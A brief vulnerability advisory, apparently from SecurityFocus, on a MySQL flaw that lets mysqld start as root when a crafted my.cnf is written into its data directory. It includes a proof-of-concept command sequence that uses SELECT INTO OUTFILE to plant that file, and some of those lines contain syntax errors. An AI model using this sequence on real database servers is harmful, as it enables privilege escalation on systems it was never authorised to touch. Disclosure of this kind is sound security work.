source: https://www.securityfocus.com/bid/7052/info A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges. An attacker can exploit this vulnerability by creating a DATADIR/my.cnf that includes the line 'user=root' under the '[mysqld]' option section. When the mysqld service is executed, it will run as the root user instead of the default user. This may allow an attacker to obtain elevated privileges on a compromised system. mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES ('[mysqld]'); mysql>INSERT IN hack VALUES ('user=root'); mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack mysql>QUIT